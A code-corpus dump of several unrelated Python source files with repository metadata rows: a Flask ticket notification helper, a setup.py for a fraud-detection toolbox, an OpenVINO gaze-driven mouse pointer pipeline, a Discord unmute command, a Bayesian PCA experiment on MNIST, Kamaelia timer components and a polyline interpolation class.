return txn_group | 42.2625 | 210 | 0.725525 | 421 | 3,381 | 5.565321 | 0.232779 | 0.032864 | 0.035851 | 0.044814 | 0.325224 | 0.237729 | 0.212548 | 0.16816 | 0.050363 | 0.050363 | 0 | 0.00264 | 0.215617 | 3,381 | 80 | 211 | 42.2625 | 0.880845 | 0.44898 | 0 | 0.23913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021739 | false | 0 | 0.086957 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df66daaa9747f0019148015d719b4599c2bca06f | 1,794 | py | Python | app/users/notification.py | AniaPeszek/ReclamationAndTicketSystem | 42551732dcc9af42dc7401fbc13b8fdb6e3c132f | [
"MIT"
] | null | null | null | app/users/notification.py | AniaPeszek/ReclamationAndTicketSystem | 42551732dcc9af42dc7401fbc13b8fdb6e3c132f | [
"MIT"
] | null | null | null | app/users/notification.py | AniaPeszek/ReclamationAndTicketSystem | 42551732dcc9af42dc7401fbc13b8fdb6e3c132f | [
"MIT"
] | null | null | null | from app import db
from flask_login import current_user
from app.models import Ticket, Reclamation, User, Message
from flask import url_for
def send_message(EventClass, event_id, recipient):
if EventClass == Ticket:
content = create_msg_body_for_new_ticket(event_id)
msg = Message(author=current_user, recipient=recipient, content=content)
db.session.add(msg)
# recipient.add_notification('new_ticket_count', recipient.new_tickets())
recipient.add_notification("open_tickets_count", recipient.open_tickets())
recipient.add_notification("unread_message_count", recipient.new_messages())
db.session.commit()
if EventClass == Reclamation:
content = create_msg_body_for_new_reclamation(event_id)
msg = Message(author=current_user, recipient=recipient, content=content)
db.session.add(msg)
recipient.add_notification("unread_message_count", recipient.new_messages())
db.session.commit()
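# Illustrative call (names are hypothetical): notify the assignee of a new
# ticket and bump their counters in one commit:
#     send_message(Ticket, new_ticket.id, assignee)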
def create_msg_body_for_new_ticket(event_id):
link = url_for("ticket_bp.ticket", ticket_number=event_id)
ticket = Ticket.query.filter_by(id=event_id).first()
reclamation = ticket.reclamation
return f"""You have new ticket.<br>
Reclamation (id={reclamation.id}) from: {reclamation.reclamation_customer.name}<br>
Part Serial Number: {reclamation.reclamation_part_sn_id.part_sn}<br>
Go to <a href="{link}">ticket.</a> """
def create_msg_body_for_new_reclamation(event_id):
link = url_for("reclamation_bp.reclamation", reclamation_number=event_id)
reclamation = Reclamation.query.filter_by(id=event_id).first()
model = reclamation.reclamation_part_sn_id.part_no.model
return f'You have a new reclamation for your part ({model}).<br>Go to <a href="{link}">reclamation.</a> '
| 46 | 109 | 0.746934 | 244 | 1,794 | 5.213115 | 0.245902 | 0.049528 | 0.040881 | 0.050314 | 0.515723 | 0.5 | 0.407233 | 0.36478 | 0.267296 | 0.267296 | 0 | 0 | 0.143813 | 1,794 | 38 | 110 | 47.210526 | 0.828125 | 0.039576 | 0 | 0.258065 | 0 | 0.032258 | 0.237071 | 0.112144 | 0 | 0 | 0 | 0 | 0 | 1 | 0.096774 | false | 0 | 0.129032 | 0 | 0.290323 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df67adfbfcad2c99ac76305f2b4d17fc4dc56088 | 1,891 | py | Python | setup.py | yutongD/Player2Vec | 22b72d75f81dd057762f0c7225a4558a25095b8f | [
"Apache-2.0"
] | 447 | 2020-05-02T05:29:04.000Z | 2022-03-30T12:48:56.000Z | setup.py | lzz-hub-dev/DGFraud | ee74ce55c9206e6c194aef01ee43246ecf226254 | [
"Apache-2.0"
] | 11 | 2020-05-03T16:36:04.000Z | 2022-02-26T22:31:00.000Z | setup.py | lzz-hub-dev/DGFraud | ee74ce55c9206e6c194aef01ee43246ecf226254 | [
"Apache-2.0"
] | 115 | 2020-05-06T01:41:36.000Z | 2022-03-30T12:15:05.000Z | from setuptools import find_packages, setup
# read the contents of README file
from os import path
from io import open  # for Python 2 and 3 compatibility
this_directory = path.abspath(path.dirname(__file__))
# read the contents of requirements.txt
with open(path.join(this_directory, 'requirements.txt'),
          encoding='utf-8') as f:
    requirements = f.read().splitlines()
setup(name='DGFraud',
      version="0.1.0",
      author="Yutong Deng, Yingtong Dou, Hengrui Zhang, and UIC BDSC Lab",
      author_email="bdscsafegraph@gmail.com",
      description='a GNN-based toolbox for fraud detection in Tensorflow',
      long_description=open("README.md", "r", encoding="utf-8").read(),
      long_description_content_type="text/markdown",
      url='https://github.com/safe-graph/DGFraud',
      download_url='https://github.com/safe-graph/DGFraud/archive/master.zip',
      keywords=['fraud detection', 'anomaly detection', 'graph neural network',
                'data mining', 'security'],
      install_requires=['numpy>=1.16.4',
                        'tensorflow>=1.14.0,<2.0',
                        'scipy>=1.2.1',
                        'scikit_learn>=0.21rc2',
                        'networkx<=1.11'
                        ],
      packages=find_packages(exclude=['test']),
      include_package_data=True,
      setup_requires=['setuptools>=38.6.0'],
      classifiers=[
          'Development Status :: 4 - Beta',
          'Intended Audience :: Education',
          'Intended Audience :: Financial and Insurance Industry',
          'Intended Audience :: Science/Research',
          'Intended Audience :: Developers',
          'Intended Audience :: Information Technology',
          'License :: OSI Approved :: Apache Software License',
          'Programming Language :: Python :: 3.6',
          'Programming Language :: Python :: 3.7',
      ],
      )
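# Usage sketch (assumed commands, not taken from the DGFraud docs):
#   pip install -e .        # editable install from a source checkout
#   python setup.py sdist   # build a source distribution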
| 41.108696 | 79 | 0.611846 | 213 | 1,891 | 5.342723 | 0.605634 | 0.070299 | 0.026362 | 0.029877 | 0.057996 | 0.057996 | 0.057996 | 0 | 0 | 0 | 0 | 0.025605 | 0.256478 | 1,891 | 45 | 80 | 42.022222 | 0.783784 | 0.054469 | 0 | 0.051282 | 0 | 0 | 0.455157 | 0.037556 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.076923 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df67b484bc799e1c36c9aac365dd46cca21d5596 | 7,200 | py | Python | main.py | ojsindher/Computer-Pointer-Controller-OPENVINO | 7e6c286d0eb90005cc5fc881439f09776c31755e | [
"MIT"
] | null | null | null | main.py | ojsindher/Computer-Pointer-Controller-OPENVINO | 7e6c286d0eb90005cc5fc881439f09776c31755e | [
"MIT"
] | null | null | null | main.py | ojsindher/Computer-Pointer-Controller-OPENVINO | 7e6c286d0eb90005cc5fc881439f09776c31755e | [
"MIT"
] | null | null | null | import os
import cv2
import time
import numpy as np
import pyautogui
import matplotlib.pyplot as plt
from input_feeder import InputFeeder
from mouse_controller import MouseController
from face_detection import Model_fd
from gaze_estimation import Model_ge
from facial_landmarks_detection import Model_fld
from head_pose_estimation import Model_hpe
from argparse import ArgumentParser
def build_parser():
    parser = ArgumentParser()
    required = parser.add_argument_group('required', 'These are must-provide arguments for the main.py script')
    optional = parser.add_argument_group('optional', 'These are optional arguments, as there are default values set in the app itself')
    optional.add_argument("-d", "--device", type=str, default="CPU", help="Specify the target device to infer on: CPU, GPU, FPGA or MYRIAD is acceptable. The sample will look for a suitable plugin for the device specified (CPU by default)")
    optional.add_argument("-c", "--prob_threshold", type=float, default=0.5, help="This specifies the probability threshold value for the face detection model")
    optional.add_argument("-FDO", type=int, default=0, help="to toggle displaying face detector bounding boxes")
    optional.add_argument("-FLD", type=int, default=0, help="to toggle displaying eyes bounding boxes")
    required.add_argument("-t", "--input_type", required=True, type=str, help="This specifies the type of input, whether it is an image, a pre-saved video, or the feed from a webcam")
    required.add_argument("-f", "--model_fd", required=True, type=str, help="Path to the model's directory with a trained model for face detection.")
    required.add_argument("-g", "--model_ge", required=True, type=str, help="Path to the model's directory with a trained model for gaze estimation.")
    required.add_argument("-p", "--model_hpe", required=True, type=str, help="Path to the model's directory with a trained model for head pose estimation.")
    required.add_argument("-l", "--model_fld", required=True, type=str, help="Path to the model's directory with a trained model for facial landmarks detection.")
    required.add_argument("-i", "--input", required=True, type=str, help="Path to image or video file")
    return parser
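# Example invocation (sketch; the model directory paths are placeholders):
#   python main.py -t video -i demo.mp4 -f models/fd -g models/ge -p models/hpe -l models/fld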
def main(args):
    device = args.device
    input_type = args.input_type
    input_file = args.input
    model_fd = args.model_fd
    model_ge = args.model_ge
    model_hpe = args.model_hpe
    model_fld = args.model_fld
    conf = args.prob_threshold
    flag_fd = args.FDO
    flag_fld = args.FLD
    '''Initializing all the classes and checking the different model classes for any unsupported layers'''
    Face_Det = Model_fd(model_fd)
    start_lt_fd = time.time()
    Face_Det.load_model(device)
    total_lt_fd = round((time.time() - start_lt_fd), 2)
    Face_Det.check_model(device)
    Head_Pose = Model_hpe(model_hpe)
    start_lt_hpe = time.time()
    Head_Pose.load_model(device)
    total_lt_hpe = round((time.time() - start_lt_hpe), 2)
    Head_Pose.check_model(device)
    Landmarks_Det = Model_fld(model_fld)
    start_lt_fld = time.time()
    Landmarks_Det.load_model(device)
    total_lt_fld = round((time.time() - start_lt_fld), 2)
    Landmarks_Det.check_model(device)
    Gaze_Det = Model_ge(model_ge)
    start_lt_ge = time.time()
    Gaze_Det.load_model(device)
    total_lt_ge = round((time.time() - start_lt_ge), 2)
    Gaze_Det.check_model(device)
    mouse = MouseController('medium', 'medium')
    '''Reading the input in a loop and passing it through the pipeline of all the models, then using their output
    to move the pointer on screen using the pyautogui python library'''
    feed = InputFeeder(input_type=input_type, input_file=input_file)
    feed.load_data()
    (width, height, fps) = feed.get_dim()
    out_video = cv2.VideoWriter(os.path.join('/home/workspace/CPC_project/results/', 'output_video.mp4'), 0x00000021, fps, (width, height))
    start_inference_time = time.time()
    counter = 0
    for batch in feed.next_batch():
        if np.shape(batch) != ():
            counter += 1
            ppi_fd = Face_Det.preprocess_input(batch)
            outputs_fd = Face_Det.predict(ppi_fd)
            ppo_fd, ymin, ymax, xmin, xmax = Face_Det.preprocess_output(batch, width, height, conf, outputs_fd)
            ppi_hpe = Head_Pose.preprocess_input(ppo_fd)
            (yaw_a, pitch_a, roll_a) = Head_Pose.predict(ppi_hpe)
            (yaw, pitch, roll) = Head_Pose.preprocess_output(yaw_a, pitch_a, roll_a)
            (ppi_fld, height_fd, width_fd) = Landmarks_Det.preprocess_input(ppo_fd)
            outputs_fld = Landmarks_Det.predict(ppi_fld)
            (left_eye, right_eye, batch, ppo_fd_) = Landmarks_Det.preprocess_output(batch, ppo_fd, height_fd, width_fd, outputs_fld, ymin, ymax, xmin, xmax, flag_fld)
            if np.shape(left_eye) != () and np.shape(right_eye) != () and np.sum(left_eye) != 0 and np.sum(right_eye) != 0:
                (ppi_ge_left, ppi_ge_right) = Gaze_Det.preprocess_input(left_eye, right_eye)
                outputs_ge = Gaze_Det.predict(ppi_ge_left, ppi_ge_right, yaw, pitch, roll)
                (x, y, z) = Gaze_Det.preprocess_output(outputs_ge)
                print(x, y, z)
                print(counter)
            else:
                continue
            (screen_width, screen_height) = pyautogui.size()
            mouse.move(x, y)
            (xx, yy) = pyautogui.position()
            xx = int((width / screen_width) * xx)
            yy = int((height / screen_height) * yy)
            batch[(yy - 14):(yy + 14), (xx - 7):(xx + 7)] = [0, 0, 255]
            if flag_fd:
                cv2.rectangle(batch, (xmin, ymin), (xmax, ymax), (0, 0, 255), 3)
            out_video.write(batch)
        else:
            break
    feed.close()
    total_time = time.time() - start_inference_time
    total_inference_time = round(total_time, 1)
    fps_avg = counter / total_inference_time
    with open(os.path.join('/home/workspace/CPC_project/results/', 'stats.txt'), 'w') as f:
        f.write(str(total_lt_fd) + '\n')
        f.write(str(total_lt_hpe) + '\n')
        f.write(str(total_lt_fld) + '\n')
        f.write(str(total_lt_ge) + '\n')
        f.write(str(total_inference_time) + '\n')
        f.write(str(fps_avg) + '\n')
    print(f"Load_Time-Face-Detection-Model:{total_lt_fd}")
    print(f"Load_Time-Head-Pose-Estimation-Model:{total_lt_hpe}")
    print(f"Load_Time-Facial-Landmarks-Detection-Model:{total_lt_fld}")
    print(f"Load_Time-Gaze-Estimation-Model:{total_lt_ge}")
    print(f"Total_Inference_Time:{total_inference_time}")
    print(f"FPS average:{fps_avg}")
    print(f"Total no. of frames:{counter}")
    cv2.destroyAllWindows()
if __name__ == '__main__':
    args = build_parser().parse_args()
    main(args)
| 47.368421 | 279 | 0.647778 | 1,005 | 7,200 | 4.410945 | 0.230846 | 0.029777 | 0.025716 | 0.025716 | 0.213174 | 0.163997 | 0.100383 | 0.087751 | 0.053012 | 0.044665 | 0 | 0.008059 | 0.241667 | 7,200 | 152 | 280 | 47.368421 | 0.803846 | 0 | 0 | 0.033333 | 0 | 0.016667 | 0.247721 | 0.045145 | 0 | 0 | 0.001447 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.116667 | 0 | 0.141667 | 0.075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6859e42b7787e019db751ab64cf0c502a0c439 | 425 | py | Python | forumsweats/commands/unmoot.py | duckiecousingaming/forum-sweats | 6addf3159e59902a6905c25240bf54f8a7a00e76 | [
"MIT"
] | 10 | 2020-10-15T18:08:53.000Z | 2021-12-11T13:15:05.000Z | forumsweats/commands/unmoot.py | duckiecousingaming/forum-sweats | 6addf3159e59902a6905c25240bf54f8a7a00e76 | [
"MIT"
] | 59 | 2020-10-06T23:19:25.000Z | 2022-03-06T14:16:31.000Z | forumsweats/commands/unmoot.py | duckiecousingaming/forum-sweats | 6addf3159e59902a6905c25240bf54f8a7a00e76 | [
"MIT"
] | 13 | 2020-10-19T20:46:47.000Z | 2022-03-05T20:17:40.000Z | from ..commandparser import Member
from ..discordbot import unmoot_user
import discord
name = 'unmoot'
channels = None
roles = ('helper', 'trialhelper')
args = '<member>'
async def run(message, member: Member):
    'Removes a moot from a member'
    await unmoot_user(
        member.id,
        reason=f'Unmooted by {str(message.author)}'
    )
    await message.send(embed=discord.Embed(
        description=f'<@{member.id}> has been unmooted.'
    ))
| 20.238095 | 50 | 0.717647 | 57 | 425 | 5.315789 | 0.614035 | 0.066007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148235 | 425 | 20 | 51 | 21.25 | 0.837017 | 0 | 0 | 0 | 0 | 0 | 0.294118 | 0.049412 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1875 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df69316b0035a262181610684f3b3f628ccdb9dd | 1,531 | py | Python | datareduction/TestPCA_MNIST.py | andresmasegosa/PRML-CoreSets | fb768debb15e3ff6f5b65b7224915a41c1493f3d | [
"MIT"
] | null | null | null | datareduction/TestPCA_MNIST.py | andresmasegosa/PRML-CoreSets | fb768debb15e3ff6f5b65b7224915a41c1493f3d | [
"MIT"
] | null | null | null | datareduction/TestPCA_MNIST.py | andresmasegosa/PRML-CoreSets | fb768debb15e3ff6f5b65b7224915a41c1493f3d | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn import datasets
from datareduction.bayesian_pca_DR import BayesianPCA_DR
from prml.feature_extractions import BayesianPCA, PCA
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/")
data = mnist.train.images
target = mnist.train.labels
x_train = data[np.random.choice(np.where(target == 3)[0], 1000)]
D = data.shape[1]
data = mnist.test.images
target = mnist.test.labels
x_test = data[np.random.choice(np.where(target == 3)[0], 1000)]
mnist3 = x_train
pca = BayesianPCA(n_components=4)
pca.fit(mnist3, initial="eigen")
plt.figure(0)
plt.subplot(1, 5, 1)
plt.imshow(pca.mean.reshape(28, 28))
plt.axis('off')
for i, w in enumerate(pca.W.T[::-1]):
    plt.subplot(1, 5, i + 2)
    plt.imshow(w.reshape(28, 28))
    plt.axis('off')
# plt.show()
pca = BayesianPCA_DR(n_components=4)
pca.fit(mnist3, initial="eigen", n_clusters=100, cluster_method="SS")
plt.figure(1)
plt.subplot(1, 5, 1)
plt.imshow(pca.mean.reshape(28, 28))
plt.axis('off')
for i, w in enumerate(pca.W.T[::-1]):
    plt.subplot(1, 5, i + 2)
    plt.imshow(w.reshape(28, 28))
    plt.axis('off')
pca = BayesianPCA_DR(n_components=4)
pca.fit(mnist3, initial="eigen", n_clusters=10, cluster_method="NoSS")
plt.figure(2)
plt.subplot(1, 5, 1)
plt.imshow(pca.mean.reshape(28, 28))
plt.axis('off')
for i, w in enumerate(pca.W.T[::-1]):
    plt.subplot(1, 5, i + 2)
    plt.imshow(w.reshape(28, 28))
    plt.axis('off')
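# Uncomment to display the three figures when running interactively
# (assumes a GUI-capable matplotlib backend is available):
# plt.show()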
| 27.339286 | 70 | 0.70934 | 268 | 1,531 | 3.973881 | 0.272388 | 0.026291 | 0.061972 | 0.067606 | 0.548357 | 0.547418 | 0.547418 | 0.547418 | 0.513615 | 0.513615 | 0 | 0.054195 | 0.120183 | 1,531 | 55 | 71 | 27.836364 | 0.736451 | 0.006532 | 0 | 0.5 | 0 | 0 | 0.032895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.152174 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6a3a82390987ac2500ff7fb4289e4ffe93a4b6 | 5,520 | py | Python | Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/SA/Time.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 12 | 2015-10-20T10:22:01.000Z | 2021-07-19T10:09:44.000Z | Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/SA/Time.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 2 | 2015-10-20T10:22:55.000Z | 2017-02-13T11:05:25.000Z | Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/SA/Time.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 6 | 2015-03-09T12:51:59.000Z | 2020-03-01T13:06:21.000Z | # -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
#     http://www.kamaelia.org/AUTHORS - please extend this file,
#     not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
This file contains some utility classes which are used by both the client and
server components of the port tester application.
'''
import time
import Axon
from Axon.Ipc import producerFinished, shutdownMicroprocess, shutdown
from Kamaelia.IPC import serverShutdown
# FIXME: Needs example of usage. Very similar to lots of existing
# FIXME: components, but with probably much more accuracy - so nabbing
# FIXME: one of those examples would be good.
#
# FIXME: SingleTick is a specialisation of PeriodicTick. If PeriodicTick had
# FIXME: a "maximum number of ticks" option, that would eliminate the need for
# FIXME: SingleTick to duplicate code. (Name could still exist, names are
# FIXME: good :-) - but be a factory method (aka prefab) instead - or
# FIXME: better a class which changes the default count argument :-)
class SingleTick(Axon.ThreadedComponent.threadedcomponent):
    '''
    This threaded component will wait "delay" seconds, then send True out its
    outbox and shut down. You can specify an optional "check_interval" which
    will cause the component to periodically check its control inbox for
    early termination signals.
    SingleTick(delay, check_interval=delay, tick_mesg=True)
    '''
    Inboxes = {'inbox': 'ignored',
               'control': 'Sending a message here will cause the component to shutdown'}
    Outboxes = {'outbox': 'Sends "tick_mesg" (def: True) after "delay" seconds unless interrupted first',
                'signal': 'Sends producerFinished if not interrupted else sends interruption message'}
    tick_mesg = True
    check_interval = None
    def __init__(self, delay, **kwargs):
        super(SingleTick, self).__init__(**kwargs)
        self.delay = delay
        if self.check_interval is None or self.check_interval > delay:
            self.check_interval = delay
    def main(self):
        delay_until = time.time() + self.delay
        remaining = self.delay
        while remaining > 0 and not self.dataReady('control'):
            if remaining < self.check_interval:
                self.pause(remaining)
            else:
                self.pause(self.check_interval)
            remaining = delay_until - time.time()
        if remaining <= 0:
            self.send(self.tick_mesg, 'outbox')
            self.send(producerFinished(self), 'signal')
        elif self.dataReady('control'):
            self.send(self.recv('control'), 'signal')
class PeriodicTick(Axon.ThreadedComponent.threadedcomponent):
    '''
    This threaded component will periodically (every "delay" seconds) send
    True out its outbox. You can specify an optional "check_interval" which
    will cause the component to more frequently check its control inbox for
    termination signals.
    PeriodicTick(delay, check_interval=delay, tick_mesg=True)
    '''
    Inboxes = {'inbox': 'ignored',
               'control': 'Sending a message here will cause the component to shutdown'}
    Outboxes = {'outbox': 'Sends a "tick_mesg" (def: True) every "delay" seconds',
                'signal': 'Sends termination signal received on "control"'}
    tick_mesg = True
    check_interval = None
    def __init__(self, delay, **kwargs):
        super(PeriodicTick, self).__init__(**kwargs)
        self.delay = delay
        if self.check_interval is None or self.check_interval > delay:
            self.check_interval = delay
    def main(self):
        start_time = time.time()
        tick_count = 1
        while not self.dataReady('control'):
            delay_until = start_time + self.delay * tick_count
            remaining = delay_until - time.time()
            while remaining > 0 and not self.dataReady('control'):
                if remaining < self.check_interval:
                    self.pause(remaining)
                else:
                    self.pause(self.check_interval)
                remaining = delay_until - time.time()
            if remaining <= 0:
                self.send(self.tick_mesg, 'outbox')
                tick_count += 1
        self.send(self.recv('control'), 'signal')
if __name__ == "__main__":
    from Kamaelia.Chassis.Pipeline import Pipeline
    from Kamaelia.Util.Console import ConsoleEchoer
    if 0:
        Pipeline(
            PeriodicTick(0.3),
            ConsoleEchoer(use_repr=True),
        ).run()
    if 0:
        Pipeline(
            PeriodicTick(0.3, tick_mesg="Hello\n"),
            ConsoleEchoer(),
        ).run()
    if 0:
        Pipeline(
            PeriodicTick(delay=0.3, tick_mesg="Hello\n", check_interval=0.01),
            ConsoleEchoer(),
        ).run()
    Pipeline(
        SingleTick(0.3),
        ConsoleEchoer(use_repr=True),
    ).run()
| 37.297297 | 104 | 0.655978 | 681 | 5,520 | 5.22467 | 0.323054 | 0.062114 | 0.04778 | 0.023609 | 0.433671 | 0.418775 | 0.35638 | 0.304666 | 0.304666 | 0.304666 | 0 | 0.007522 | 0.253442 | 5,520 | 147 | 105 | 37.55102 | 0.85586 | 0.368297 | 0 | 0.65 | 0 | 0 | 0.154642 | 0 | 0 | 0 | 0 | 0.006803 | 0 | 1 | 0.05 | false | 0 | 0.075 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6a3f97128cd0432d6dd7f8b604aa0b9b234860 | 4,180 | py | Python | p3iv_utils_polyline/src/p3iv_utils_polyline/interpolated_polyline_segment.py | fzi-forschungszentrum-informatik/P3IV | 51784e6dc03dcaa0ad58a5078475fa4daec774bd | [
"BSD-3-Clause"
] | 4 | 2021-07-27T06:56:22.000Z | 2022-03-22T11:21:30.000Z | p3iv_utils_polyline/src/p3iv_utils_polyline/interpolated_polyline_segment.py | fzi-forschungszentrum-informatik/P3IV | 51784e6dc03dcaa0ad58a5078475fa4daec774bd | [
"BSD-3-Clause"
] | null | null | null | p3iv_utils_polyline/src/p3iv_utils_polyline/interpolated_polyline_segment.py | fzi-forschungszentrum-informatik/P3IV | 51784e6dc03dcaa0ad58a5078475fa4daec774bd | [
"BSD-3-Clause"
] | 1 | 2021-10-10T01:56:44.000Z | 2021-10-10T01:56:44.000Z | # This file is part of the P3IV Simulator (https://github.com/fzi-forschungszentrum-informatik/P3IV),
# copyright by FZI Forschungszentrum Informatik, licensed under the BSD-3 license (see LICENSE file in main directory)
import numpy as np
import warnings
def hypot(a, b):
    # do not use np.hypot(a, b); it may not work well with autodiff & jit
    return (a ** 2 + b ** 2) ** 0.5
class InterpolatedPolylineSegment(object):
    def __init__(self, xB, yB, thetaB, xT, yT, thetaT, mode):
        self.xB = xB
        self.yB = yB
        self.thetaB = thetaB
        self.thetaT = thetaT
        self.theta = np.arctan2(yT - yB, xT - xB)
        self.cosTheta = np.cos(self.theta)
        self.sinTheta = np.sin(self.theta)
        self.hyp = hypot(yT - yB, xT - xB)
        self.mB = np.tan(thetaB - self.theta)
        self.mT = np.tan(thetaT - self.theta)
        self.mode = mode
        self._MAX_VALUE = 1e10
        # do not use float('inf')
    def __call__(self, x, y):
        xH, yH = self._convertHesseNormal(x, y)
        # signum on the line-aligned coordinate system is the sign of the y-axis
        signum = np.sign(yH)
        # calculate interpolation factor
        lmda = self._getLambda(self.hyp, self.mB, self.mT, xH, yH)
        valid, lmda = self._clipLambda(lmda)
        if valid:
            # this is the segment that may be closest to the point (for mode='MIDDLE')
            d = signum * self._normalDistance(self.hyp, xH, yH, lmda)
            # print("MIDDLE ", "x: ", xr, "y: ", yr, "d : ", d, "lambda : ", lmda)
        else:
            d = signum * self._MAX_VALUE
        return d, lmda
    def length(self, lmda=1.0):
        return lmda * self.hyp
    def tangent(self, x, y, d, lmda):
        xH, yH = self._convertHesseNormal(x, y)
        # add 'theta' to get the tangent in the global Cartesian frame
        tangent = self._getTangent(self.hyp, xH, yH, d, lmda, self.mB, self.mT) + self.theta
        return tangent
    def getBase(self):
        return self.xB, self.yB, self.theta
    def _clipLambda(self, lmda):
        """
        Check interpolation factor if it is valid and clip it
        """
        valid = True
        if (lmda < 0.0) or (lmda > 1.0):
            if self.mode == "MIDDLE":
                # skip to the next segment in polyline
                valid = False
            elif self.mode == "FIRST":
                if lmda < 0.0:
                    lmda = 0.0
                elif lmda > 1.0:
                    valid = False
            elif self.mode == "LAST":
                # let the last segment's lambda be flexible
                if lmda > 1.0:
                    lmda = 1.0
                elif lmda < 0.0:
                    valid = False
            else:
                warnings.warn("An unexpected case detected!")
                valid = False
        return (valid, lmda)
    def _convertHesseNormal(self, x, y):
        """
        Convert to Hesse-normal form; aka line-aligned coordinate frame
        """
        # calculate the difference of the given point to the one end of the line
        xx = x - self.xB
        yy = y - self.yB
        # rotate point Theta clockwise for line-referenced coordinates
        xH = xx * self.cosTheta + yy * self.sinTheta
        yH = -xx * self.sinTheta + yy * self.cosTheta
        return xH, yH
    @staticmethod
    def _getTangent(l, xH, yH, d, lmda, mB, mT):
        """
        Get tangent vector angle in line-aligned coordinates
        """
        if d == 0:
            return lmda * mB + (1 - lmda) * mT
        dx = np.divide(-1 * (lmda * l - xH), d)
        dy = np.divide(-1 * (-yH), d)
        dTheta = np.arctan2(dy, dx)  # normal vector
        tangent = dTheta - np.pi / 2  # tangent vector
        return tangent
    @staticmethod
    def _getLambda(l, mb, mt, xH, yH):
        """
        Calculate interpolation factor lambda
        """
        # cf. Eq. (3.9) in Diss. Ziegler
        return (xH + yH * mb) / (l - yH * (mt - mb))
    @staticmethod
    def _normalDistance(l, xH, yH, lmda):
        """
        Find the normal distance in Hesse normal form
        """
        return hypot((lmda * l - xH), yH)
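# Minimal usage sketch (illustrative values, not from the original project):
# a straight unit segment from (0, 0) to (1, 0) with horizontal end tangents,
# queried with a point above its midpoint.
if __name__ == "__main__":
    seg = InterpolatedPolylineSegment(0.0, 0.0, 0.0, 1.0, 0.0, 0.0, mode="MIDDLE")
    d, lmda = seg(0.5, 0.2)  # signed normal distance and interpolation factor
    print(d, lmda)  # ~0.2 ~0.5: the point lies 0.2 to the left, halfway along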
